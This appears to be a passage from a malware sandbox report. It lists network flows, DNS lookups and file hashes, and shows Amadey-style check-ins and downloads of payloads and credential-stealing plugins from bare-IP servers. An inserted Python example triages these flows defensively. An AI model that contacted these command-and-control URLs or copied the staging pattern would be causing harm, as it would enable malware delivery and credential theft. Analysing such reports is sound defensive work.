                                        GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E

                                        HTTP Response

                                        204

                                        HTTP Request

                                        GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E

                                        HTTP Response

                                        204
                                      • 23.62.61.194:443
                                        https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893
                                        tls, http2
                                        1.5kB
                                        5.4kB
                                        17
                                        12

                                        HTTP Request

                                        GET https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893

                                        HTTP Response

                                        200
                                      • 193.233.132.139:80
                                        http://193.233.132.139/sev56rkm/index.php
                                        http
                                        explorta.exe
                                        1.9kB
                                        2.1kB
                                        16
                                        13

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200
                                      • 193.233.132.167:80
                                        http://193.233.132.167/cost/random.exe
                                        http
                                        explorta.exe
                                        274.8kB
                                        8.1MB
                                        5794
                                        5793

                                        HTTP Request

                                        GET http://193.233.132.167/cost/sarra.exe

                                        HTTP Response

                                        200

                                        HTTP Request

                                        GET http://193.233.132.167/mine/amert.exe

                                        HTTP Response

                                        200

                                        HTTP Request

                                        GET http://193.233.132.167/mine/random.exe

                                        HTTP Response

                                        200

                                        HTTP Request

                                        GET http://193.233.132.167/cost/random.exe

                                        HTTP Response

                                        200
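The chrosha.exe, rundll32.exe and explorta.exe flows above show the Amadey check-in, plugin-staging and loader pattern: small form-urlencoded POSTs to index.php on a bare-IP host over plain HTTP with Cache-Control: no-cache and no User-Agent, GETs of cred64.dll and clip64.dll from /Plugins/ (served as application/octet-stream by nginx, with rundll32.exe then posting to the same index.php), and EXE downloads from the same host. The Python below is an added example, not code from the sandbox report or from any vendor tool. It runs those heuristics over constructed flow records modelled on the entries above (field names, abbreviated headers and the record layout are assumptions of this example) and cross-checks the nginx ETag of a plugin response against its Content-Length and Last-Modified.

```python
"""Added example: heuristic triage of sandbox HTTP flow records for Amadey-style
C2 traffic, plus a cross-check of the nginx ETags seen on the plugin downloads.
Not code from the report or from any vendor tool."""
import re
from datetime import datetime, timezone
from urllib.parse import urlparse

# Constructed sample records modelled on the flows above (abbreviated headers,
# not copied verbatim from the report; the record layout is an assumption).
SAMPLE_FLOWS = [
    {"process": "chrome.exe", "method": "GET",
     "url": "https://clients2.google.com/service/update2/crx?os=win&arch=x64",
     "headers": {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}},
    {"process": "chrosha.exe", "method": "POST",
     "url": "http://193.233.132.167/enigma/index.php",
     "headers": {"content-type": "application/x-www-form-urlencoded",
                 "content-length": "4", "cache-control": "no-cache"}},
    {"process": "chrosha.exe", "method": "GET",
     "url": "http://193.233.132.167/enigma/Plugins/cred64.dll",
     "headers": {},
     "response": {"content-type": "application/octet-stream",
                  "content-length": "1285632",
                  "last-modified": "Thu, 01 Feb 2024 16:00:36 GMT",
                  "etag": '"65bbc024-139e00"'}},
    {"process": "rundll32.exe", "method": "POST",
     "url": "http://193.233.132.167/enigma/index.php",
     "headers": {"content-type": "application/x-www-form-urlencoded",
                 "content-length": "21", "cache-control": "no-cache"}},
    {"process": "explorta.exe", "method": "GET",
     "url": "http://193.233.132.167/cost/sarra.exe", "headers": {}},
]

BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def flow_flags(flow):
    """Return the heuristic labels that fire for one flow record."""
    u = urlparse(flow["url"])
    hdr = {k.lower(): v for k, v in flow.get("headers", {}).items()}
    plain_http_to_ip = u.scheme == "http" and bool(BARE_IPV4.match(u.hostname or ""))
    path = u.path.lower()
    flags = []
    # Check-in shape seen above: POST to /index.php on a bare-IP host over plain
    # HTTP, form-urlencoded, tiny body, no User-Agent header at all.
    if (flow["method"] == "POST" and plain_http_to_ip and path.endswith("/index.php")
            and hdr.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and "user-agent" not in hdr and int(hdr.get("content-length", "0")) < 1024):
        flags.append("c2-checkin")
    # Plugin staging: GET /<dir>/Plugins/<name>.dll from the same kind of host.
    if flow["method"] == "GET" and plain_http_to_ip and re.search(r"/plugins/[^/]+\.dll$", path):
        flags.append("plugin-fetch")
    # Follow-on payloads: GET of an .exe from a bare-IP host over plain HTTP.
    if flow["method"] == "GET" and plain_http_to_ip and path.endswith(".exe"):
        flags.append("payload-download")
    # rundll32.exe beaconing to the C2 is the loaded plugin talking, not Windows.
    if flow["process"].lower() == "rundll32.exe" and flags:
        flags.append("rundll32-beacon")
    return flags


def triage(flows):
    """Keep only flagged flows as (process, url, flags) tuples."""
    out = []
    for f in flows:
        flags = flow_flags(f)
        if flags:
            out.append((f["process"], f["url"], flags))
    return out


def iocs(flows):
    """Collect the hosts and URL paths of every flagged flow, sorted."""
    hosts, paths = set(), set()
    for _, url, _ in triage(flows):
        u = urlparse(url)
        hosts.add(u.hostname)
        paths.add(u.path)
    return sorted(hosts), sorted(paths)


def parse_nginx_etag(etag):
    """nginx's default ETag is '"<hex mtime>-<hex size>"'; return (mtime, size)."""
    m = re.fullmatch(r'"?([0-9a-f]+)-([0-9a-f]+)"?', etag.strip())
    if not m:
        return None
    return int(m.group(1), 16), int(m.group(2), 16)


def etag_consistent(resp):
    """True when the ETag decodes to exactly the Content-Length and Last-Modified
    of the response, i.e. a stock nginx serving a static file unchanged."""
    parsed = parse_nginx_etag(resp.get("etag", ""))
    if parsed is None:
        return False
    mtime, size = parsed
    lm = datetime.strptime(resp["last-modified"], "%a, %d %b %Y %H:%M:%S GMT")
    lm = lm.replace(tzinfo=timezone.utc)
    return size == int(resp["content-length"]) and mtime == int(lm.timestamp())


if __name__ == "__main__":
    for proc, url, flags in triage(SAMPLE_FLOWS):
        print(f"{proc:14} {','.join(flags):28} {url}")
    print("IOCs:", iocs(SAMPLE_FLOWS))
    plugin = next(f for f in SAMPLE_FLOWS if "Plugins" in f["url"])
    print("ETag consistent:", etag_consistent(plugin["response"]))
```

The ETag check works because stock nginx builds its ETag from the file's mtime and size in hex: both plugin ETags in the report decode to exactly the Content-Length and Last-Modified shown (1285632 bytes and 112128 bytes, both modified on 1 Feb 2024 at 16:00 UTC), so the tag doubles as a cheap fingerprint for the same staged file across reports and hosts.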
                                      • 142.250.179.238:443
                                        www.youtube.com
                                        tls, http2
                                        chrome.exe
                                        1.0kB
                                        8.4kB
                                        10
                                        10
                                      • 142.250.179.238:443
                                        https://www.youtube.com/account
                                        tls, http2
                                        chrome.exe
                                        2.2kB
                                        10.7kB
                                        17
                                        20

                                        HTTP Request

                                        GET https://www.youtube.com/account
                                      • 172.217.16.234:443
                                        https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
                                        tls, http2
                                        chrome.exe
                                        1.9kB
                                        7.0kB
                                        16
                                        17

                                        HTTP Request

                                        GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
                                      • 172.217.16.238:443
                                        https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1
                                        tls, http2
                                        chrome.exe
                                        3.2kB
                                        25.8kB
                                        25
                                        34

                                        HTTP Request

                                        GET https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684

                                        HTTP Request

                                        GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1
                                      • 142.250.178.4:443
                                        www.google.com
                                        tls
                                        chrome.exe
                                        953 B
                                        4.8kB
                                        8
                                        9
                                      • 142.250.187.206:443
                                        https://play.google.com/log?format=json&hasfast=true&authuser=0
                                        tls, http2
                                        chrome.exe
                                        1.7kB
                                        8.5kB
                                        14
                                        15

                                        HTTP Request

                                        OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
                                      • 193.233.132.167:80
                                        http://193.233.132.167/enigma/Plugins/clip64.dll
                                        http
                                        chrosha.exe
                                        49.5kB
                                        1.4MB
                                        1042
                                        1041

                                        HTTP Request

                                        POST http://193.233.132.167/enigma/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.167/enigma/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        GET http://193.233.132.167/enigma/Plugins/cred64.dll

                                        HTTP Response

                                        200

                                        HTTP Request

                                        GET http://193.233.132.167/enigma/Plugins/clip64.dll

                                        HTTP Response

                                        200
                                      • 193.233.132.167:80
                                        http://193.233.132.167/enigma/index.php
                                        http
                                        rundll32.exe
                                        403 B
                                        351 B
                                        5
                                        3

                                        HTTP Request

                                        POST http://193.233.132.167/enigma/index.php

                                        HTTP Response

                                        200
                                      • 193.233.132.167:80
                                        http://193.233.132.167/enigma/index.php
                                        http
                                        rundll32.exe
                                        386 B
                                        891 B
                                        5
                                        4

                                        HTTP Request

                                        POST http://193.233.132.167/enigma/index.php

                                        HTTP Response

                                        200
                                      • 192.178.49.163:443
                                        https://beacons.gcp.gvt2.com/domainreliability/upload-nel
                                        tls, http2
                                        chrome.exe
                                        3.4kB
                                        8.0kB
                                        27
                                        28

                                        HTTP Request

                                        POST https://beacons.gcp.gvt2.com/domainreliability/upload

                                        HTTP Request

                                        OPTIONS https://beacons.gcp.gvt2.com/domainreliability/upload-nel

                                        HTTP Request

                                        POST https://beacons.gcp.gvt2.com/domainreliability/upload-nel

                                        HTTP Response

                                        200

                                        HTTP Response

                                        200
                                      • 173.194.69.84:443
                                        accounts.google.com
                                        tls, http2
                                        chrome.exe
                                        953 B
                                        5.8kB
                                        8
                                        8
                                      • 172.217.16.238:443
                                        clients2.google.com
                                        tls, http2
                                        chrome.exe
                                        999 B
                                        8.4kB
                                        9
                                        10
                                      • 8.8.8.8:53
                                        g.bing.com
                                        dns
                                        56 B
                                        151 B
                                        1
                                        1

                                        DNS Request

                                        g.bing.com

                                        DNS Response

                                        204.79.197.237
                                        13.107.21.237

                                      • 8.8.8.8:53
                                        8.8.8.8.in-addr.arpa
                                        dns
                                        66 B
                                        90 B
                                        1
                                        1

                                        DNS Request

                                        8.8.8.8.in-addr.arpa

                                      • 8.8.8.8:53
                                        237.197.79.204.in-addr.arpa
                                        dns
                                        73 B
                                        143 B
                                        1
                                        1

                                        DNS Request

                                        237.197.79.204.in-addr.arpa

                                      • 8.8.8.8:53
                                        73.159.190.20.in-addr.arpa
                                        dns
                                        72 B
                                        158 B
                                        1
                                        1

                                        DNS Request

                                        73.159.190.20.in-addr.arpa

                                      • 8.8.8.8:53
                                        240.221.184.93.in-addr.arpa
                                        dns
                                        73 B
                                        144 B
                                        1
                                        1

                                        DNS Request

                                        240.221.184.93.in-addr.arpa

                                      • 8.8.8.8:53
                                        95.221.229.192.in-addr.arpa
                                        dns
                                        73 B
                                        144 B
                                        1
                                        1

                                        DNS Request

                                        95.221.229.192.in-addr.arpa

                                      • 8.8.8.8:53
                                        194.61.62.23.in-addr.arpa
                                        dns
                                        71 B
                                        135 B
                                        1
                                        1

                                        DNS Request

                                        194.61.62.23.in-addr.arpa

                                      • 8.8.8.8:53
                                        139.132.233.193.in-addr.arpa
                                        dns
                                        74 B
                                        129 B
                                        1
                                        1

                                        DNS Request

                                        139.132.233.193.in-addr.arpa

                                      • 8.8.8.8:53
                                        167.132.233.193.in-addr.arpa
                                        dns
                                        74 B
                                        129 B
                                        1
                                        1

                                        DNS Request

                                        167.132.233.193.in-addr.arpa

                                      • 8.8.8.8:53
                                        www.youtube.com
                                        dns
                                        chrome.exe
                                        61 B
                                        271 B
                                        1
                                        1

                                        DNS Request

                                        www.youtube.com

                                        DNS Response

                                        142.250.179.238
                                        142.250.180.14
                                        142.250.187.206
                                        142.250.187.238
                                        142.250.178.14
                                        172.217.16.238
                                        142.250.200.14
                                        142.250.200.46
                                        216.58.201.110
                                        216.58.204.78
                                        216.58.212.206

                                      • 8.8.8.8:53
                                        accounts.google.com
                                        dns
                                        chrome.exe
                                        65 B
                                        81 B
                                        1
                                        1

                                        DNS Request

                                        accounts.google.com

                                        DNS Response

                                        173.194.69.84

                                      • 8.8.8.8:53
                                        195.187.250.142.in-addr.arpa
                                        dns
                                        74 B
                                        112 B
                                        1
                                        1

                                        DNS Request

                                        195.187.250.142.in-addr.arpa

                                      • 8.8.8.8:53
                                        234.187.250.142.in-addr.arpa
                                        dns
                                        74 B
                                        113 B
                                        1
                                        1

                                        DNS Request

                                        234.187.250.142.in-addr.arpa

                                      • 8.8.8.8:53
                                        238.179.250.142.in-addr.arpa
                                        dns
                                        74 B
                                        113 B
                                        1
                                        1

                                        DNS Request

                                        238.179.250.142.in-addr.arpa

                                      • 173.194.69.84:443
                                        accounts.google.com
                                        https
                                        chrome.exe
                                        10.3kB
                                        127.7kB
                                        80
                                        131
                                      • 8.8.8.8:53
                                        content-autofill.googleapis.com
                                        dns
                                        chrome.exe
                                        77 B
                                        269 B
                                        1
                                        1

                                        DNS Request

                                        content-autofill.googleapis.com

                                        DNS Response

                                        172.217.16.234
                                        142.250.200.10
                                        142.250.200.42
                                        216.58.201.106
                                        216.58.204.74
                                        216.58.212.202
                                        172.217.169.74
                                        142.250.179.234
                                        142.250.180.10
                                        142.250.187.202
                                        142.250.187.234
                                        142.250.178.10

                                      • 8.8.8.8:53
                                        accounts.youtube.com
                                        dns
                                        chrome.exe
                                        66 B
                                        110 B
                                        1
                                        1

                                        DNS Request

                                        accounts.youtube.com

                                        DNS Response

                                        172.217.16.238

                                      • 8.8.8.8:53
                                        84.69.194.173.in-addr.arpa
                                        dns
                                        72 B
                                        105 B
                                        1
                                        1

                                        DNS Request

                                        84.69.194.173.in-addr.arpa

                                      • 8.8.8.8:53
                                        3.180.250.142.in-addr.arpa
                                        dns
                                        72 B
                                        110 B
                                        1
                                        1

                                        DNS Request

                                        3.180.250.142.in-addr.arpa

                                      • 8.8.8.8:53
                                        227.212.58.216.in-addr.arpa
                                        dns
                                        73 B
                                        171 B
                                        1
                                        1

                                        DNS Request

                                        227.212.58.216.in-addr.arpa

                                      • 8.8.8.8:53
                                        234.16.217.172.in-addr.arpa
                                        dns
                                        73 B
                                        142 B
                                        1
                                        1

                                        DNS Request

                                        234.16.217.172.in-addr.arpa

                                      • 8.8.8.8:53
                                        www.google.com
                                        dns
                                        chrome.exe
                                        60 B
                                        76 B
                                        1
                                        1

                                        DNS Request

                                        www.google.com

                                        DNS Response

                                        142.250.178.4

                                      • 142.250.178.4:443
                                        www.google.com
                                        https
                                        chrome.exe
                                        3.8kB
                                        9.4kB
                                        10
                                        11
                                      • 8.8.8.8:53
                                        238.16.217.172.in-addr.arpa
                                        dns
                                        73 B
                                        142 B
                                        1
                                        1

                                        DNS Request

                                        238.16.217.172.in-addr.arpa

                                      • 8.8.8.8:53
                                        4.178.250.142.in-addr.arpa
                                        dns
                                        72 B
                                        110 B
                                        1
                                        1

                                        DNS Request

                                        4.178.250.142.in-addr.arpa

                                      • 8.8.8.8:53
                                        clients2.google.com
                                        dns
                                        chrome.exe
                                        65 B
                                        105 B
                                        1
                                        1

                                        DNS Request

                                        clients2.google.com

                                        DNS Response

                                        172.217.16.238

                                      • 172.217.16.238:443
                                        clients2.google.com
                                        https
                                        chrome.exe
                                        3.0kB
                                        7.2kB
                                        8
                                        8
                                      • 224.0.0.251:5353
                                        chrome.exe
                                        204 B
                                        3
                                      • 8.8.8.8:53
                                        play.google.com
                                        dns
                                        chrome.exe
                                        61 B
                                        77 B
                                        1
                                        1

                                        DNS Request

                                        play.google.com

                                        DNS Response

                                        142.250.187.206

                                      • 142.250.187.206:443
                                        play.google.com
                                        https
                                        chrome.exe
                                        7.7kB
                                        9.9kB
                                        18
                                        22
                                      • 8.8.8.8:53
                                        206.187.250.142.in-addr.arpa
                                        dns
                                        74 B
                                        113 B
                                        1
                                        1

                                        DNS Request

                                        206.187.250.142.in-addr.arpa

                                      • 8.8.8.8:53
                                        86.23.85.13.in-addr.arpa
                                        dns
                                        70 B
                                        144 B
                                        1
                                        1

                                        DNS Request

                                        86.23.85.13.in-addr.arpa

                                      • 8.8.8.8:53
                                        56.126.166.20.in-addr.arpa
                                        dns
                                        72 B
                                        158 B
                                        1
                                        1

                                        DNS Request

                                        56.126.166.20.in-addr.arpa

                                      • 8.8.8.8:53
                                        17.14.97.104.in-addr.arpa
                                        dns
                                        71 B
                                        135 B
                                        1
                                        1

                                        DNS Request

                                        17.14.97.104.in-addr.arpa

                                      • 8.8.8.8:53
                                        249.197.17.2.in-addr.arpa
                                        dns
                                        71 B
                                        135 B
                                        1
                                        1

                                        DNS Request

                                        249.197.17.2.in-addr.arpa

                                      • 173.194.69.84:443
                                        accounts.google.com
                                        https
                                        chrome.exe
                                        3.0kB
                                        3.8kB
                                        8
                                        10
                                      • 8.8.8.8:53
                                        beacons.gcp.gvt2.com
                                        dns
                                        chrome.exe
                                        66 B
                                        112 B
                                        1
                                        1

                                        DNS Request

                                        beacons.gcp.gvt2.com

                                        DNS Response

                                        192.178.49.163

                                      • 173.194.69.84:443
                                        accounts.google.com
                                        https
                                        chrome.exe
                                        3.9kB
                                        8.2kB
                                        10
                                        12
                                      • 172.217.16.238:443
                                        clients2.google.com
                                        https
                                        chrome.exe
                                        3.3kB
                                        9.1kB
                                        9
                                        11
                                      • 8.8.8.8:53
                                        163.49.178.192.in-addr.arpa
                                        dns
                                        73 B
                                        111 B
                                        1
                                        1

                                        DNS Request

                                        163.49.178.192.in-addr.arpa

                                      • 8.8.8.8:53
                                        48.229.111.52.in-addr.arpa
                                        dns
                                        72 B
                                        158 B
                                        1
                                        1

                                        DNS Request

                                        48.229.111.52.in-addr.arpa

                                      • 192.178.49.163:443
                                        beacons.gcp.gvt2.com
                                        https
                                        chrome.exe
                                        3.3kB
                                        7.7kB
                                        9
                                        10
                                      • 173.194.69.84:443
                                        accounts.google.com
                                        https
                                        chrome.exe
                                        2.3kB
                                        3.6kB
                                        8
                                        9

                                      MITRE ATT&CK Enterprise v15

                                      Downloads

                                      • C:\Users\Admin\1000017002\13ee951efa.exe

                                        Filesize

                                        2.3MB

                                        MD5

                                        0497563e275b32e342da1989bb2cf6f2

                                        SHA1

                                        c594939a57800487a989bc09bc9e3f899db59aea

                                        SHA256

                                        e6524423b5e5e0da456fe7d8272a30bd8e878e70854f23674998534202c77c6b

                                        SHA512

                                        7a2f7713ab7cfa24717f17a9e4e781ccd80b52841c6d1f5e4fa0690bd37077eb32d8bfb9ad67a319de3fc0ea11f2694423edb395fd9aa5183f4606f07d125295

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                        Filesize

                                        336B

                                        MD5

                                        a0af34e1f3aef14293b37c023846051e

                                        SHA1

                                        7dae01f48dda550c2639ae8ee047f97be06c753a

                                        SHA256

                                        ac42fce4ecbce007d54cfd4ea4e18d2b90ec1cd45728b93b6b55bf455ec4685c

                                        SHA512

                                        876f3dbf4e95482c23118b139d5d1b5b84cb3f85f2246a4ed8d4b6929f5ea0f23921f3163eb9526f2f1f4eb668e0cf4f45f71ca312ae9816614a2606b67bc21a

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                        Filesize

                                        2KB

                                        MD5

                                        250c3d32caabdefb4ed3592e94ca7305

                                        SHA1

                                        ac91942901e13e01e5c67d475e4cb33df1a2ed87

                                        SHA256

                                        861caefe1da6ad956b582ee7c0dfc80ad6fb79e2c6487d19cd4c8c0f5808b2ad

                                        SHA512

                                        dfa5aaac198167fbd6c9bd15efbfbb50502bc63581692e4d03bdb29ada48fc12f70ccd21fac6d7d425428a171134104b185791d4376915824f27d2f5d88ac2d2

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                        Filesize

                                        2KB

                                        MD5

                                        b0846907d836874276fd1e06bc63ff6e

                                        SHA1

                                        21c7454f2d241e9bf71530e6bae6ec07d0444838

                                        SHA256

                                        21d91ef290b92e8413d621c2f3460690fe09094aed1fe525349da8efab81ecfe

                                        SHA512

                                        153c03576f41c184399e83357ebc974fa1f082fc4543ced0f654f6c8f36414948e283ce2a8673d0ae51d14a67d9e7c10cc69a1b07e61802708e57b04fe3ddd18

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                        Filesize

                                        2B

                                        MD5

                                        d751713988987e9331980363e24189ce

                                        SHA1

                                        97d170e1550eee4afc0af065b78cda302a97674c

                                        SHA256

                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                        SHA512

                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                        Filesize

                                        524B

                                        MD5

                                        26b12922fa214dcfc52200f46a0b422e

                                        SHA1

                                        238c0e30bdef8f685e7c81f47ac92631ac86a004

                                        SHA256

                                        3eaf9b3cd8ac1e9d83598af9065c476b0aad990330cd19299d4795e9bdb35ba8

                                        SHA512

                                        666ea9b0d91df8a1d80eb692e90aacd3cc0fe8e83965d420e53a4aa2d6d76bebd71ddfd8bd274e9836a9562613a9854d8cdf07b8f2527dd1e70ab7abda022d5b

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                        Filesize

                                        524B

                                        MD5

                                        6bb6a44739a10e9c36fc4d7fad840df1

                                        SHA1

                                        69b97c2272b129ce55936657870c2202cb0c10d2

                                        SHA256

                                        deb4350b5c985cb6ea6b6f47a5d0986957e46fd778ca110ebee6f633f857b5db

                                        SHA512

                                        83e5df19852e65366f3445ae9f3bf047a581247d0a5a0bcce394fcaa0508b0b1fc11f77a740d022c51f362af4f421d8630373098b78f58ad3abd390ae85855e5

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                        Filesize

                                        7KB

                                        MD5

                                        2ace7fa8c3801d3316408c915478e826

                                        SHA1

                                        3a272b13151206dfe237d9a6f0a092b82a037eea

                                        SHA256

                                        cc6e249e219d0fe38bb698dd8551db2f4e58a9e7a397f4e9881c2e8bb8829c48

                                        SHA512

                                        e6c7f013b2c8fe61dec25850482eb01306e4385daaa10ad875287e244e2a675646479d4c3e693978dbdbf8dcb4a1863be433967187d8c01fca4cb279cf15c6cb

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                        Filesize

                                        16KB

                                        MD5

                                        39cf350c7920d55f5193ea22895bef79

                                        SHA1

                                        c6af73e251271330020eec298968e97c48ae75b7

                                        SHA256

                                        8161026454fdb4453e41aa50cd792c07c6c4c7947bae52f34908a94d32dff73c

                                        SHA512

                                        da0bd7434df05d9ef969d72a238eec1575e5146971feb97308659ded6557b3ae6bfab964ff8015cfb574c57f52ae934b679072e37453ff58702d9d05096da5a4

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                        Filesize

                                        258KB

                                        MD5

                                        da3e7a3197597c7ee9b1e7786383c2be

                                        SHA1

                                        3fd387638f59ab2aba88cc3579fa501925f681d7

                                        SHA256

                                        a9e580ef45add2b18588159dd7908fd98710f4bc2455782011b4239d22280c9e

                                        SHA512

                                        b660d2b65bcaf946ad4e631c908ebc3cb3a418100c31f3f917bafacc232f1a05482b25666045b42b87e432d22def333df18829418d3bc0ed0efd235f468f531f

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                        Filesize

                                        258KB

                                        MD5

                                        ea64c51b3f5e4a25b4c67f4a78103e20

                                        SHA1

                                        24c459e78c751be7e21fc3dad73345b551bb6897

                                        SHA256

                                        65e7ced6b2b448f75f0efbc8129b46d1df9e4d0494498cc86ff6c070fbae13a1

                                        SHA512

                                        01cc7a024e81ddef984c99a7a3cc9e87be7d80ee58cb0433eb05d584e744cb9d70ad78e83c7ea477492438605544ab74c1b4cc138f54cbd35aa5b0540af41ed1

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                        Filesize

                                        131KB

                                        MD5

                                        33955c0c4cb72786e37ceb31947fa8a5

                                        SHA1

                                        84c7b106fe1667dfb044b148902673da6a93e619

                                        SHA256

                                        c77f1e58f9b1e31745f567d8a8f7dd01d7e75b3199952d4d447ad01f6aafee66

                                        SHA512

                                        b12601cc80c68b9b5b9ce11b7e422686e4816cb724bcca9a6b640a0d156e96ab19006dd325b14a9bde919c94ffa94743a4b7b0605c097a3b0386949702a1a019

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                        Filesize

                                        279KB

                                        MD5

                                        a7e0bf1f789de3fc13b861b1949b0943

                                        SHA1

                                        6d3e90d7eaf14adfce866f6bfaaa42be2ca5d8c2

                                        SHA256

                                        2647da1a7e8ad11f2ec19e3799f7e9ff71a8649381668c870f0da88d5fe4c875

                                        SHA512

                                        e22f97b6bd09ff65d7d84349e28fb2416e94e39c38f98af3877fcd0263bbcdeac0e1328ad6691b722becdf02ed482bb842ad5c75d1ca8e69cff36883242dfff4

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                        Filesize

                                        98KB

                                        MD5

                                        3c2a602fe42ebe2b9f26c6e6ff6d6031

                                        SHA1

                                        530bf9768e3f4985dc71a3631fc085ee6fbd9422

                                        SHA256

                                        bd1ba2722cd885e1a7fdcca19cd0f19353fa04bc88873f43e4a5ab8c41a1ea92

                                        SHA512

                                        a7063b16283bbd4b5b7efba3cc49d4d0d3baadc9dc5c50ff8f6aff09f8bab54c05ef4ba98ac93de4a0bd36b8ceb5a4932f45a3a1d00113c710311222f7b0d062

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe583b8d.TMP

                                        Filesize

                                        94KB

